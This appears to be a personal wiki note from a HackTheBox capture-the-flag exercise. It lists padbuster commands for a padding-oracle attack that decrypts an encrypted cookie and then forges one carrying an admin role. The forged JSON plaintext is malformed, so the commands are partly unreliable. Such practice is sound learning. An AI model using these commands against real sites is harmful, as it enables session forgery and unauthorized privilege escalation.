Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-06-04T11:23:13-04:00

====== padbuste ======
Created Thursday 04 June 2020


**padbuster <url> authicate sample blocksize**

**padbuster http://docker.hackthebox.eu:30136/profile.php# c4pl7ZXbz5R2ZhtT8J8uYH7GuwpkdGgdVJ54u5Ni2uZzZX5BLDCwfQ%3D%3D 8 -cookies "PHPSESSID=p5cqrnarn78fr1ql39o9jrcij4; iknowmag1k=c4pl7ZXbz5R2ZhtT8J8uYH7GuwpkdGgdVJ54u5Ni2uZzZX5BLDCwfQ%3D%3D"**




**padbuster http://docker.hackthebox.eu:30136/profile.php# c4pl7ZXbz5R2ZhtT8J8uYH7GuwpkdGgdVJ54u5Ni2uZzZX5BLDCwfQ%3D%3D 8 -cookies "PHPSESSID=p5cqrnarn78fr1ql39o9jrcij4; iknowmag1k=c4pl7ZXbz5R2ZhtT8J8uYH7GuwpkdGgdVJ54u5Ni2uZzZX5BLDCwfQ%3D%3D"**
**-plaintext "{\"user\":\"test\",\"role\",\"admin\"}"**
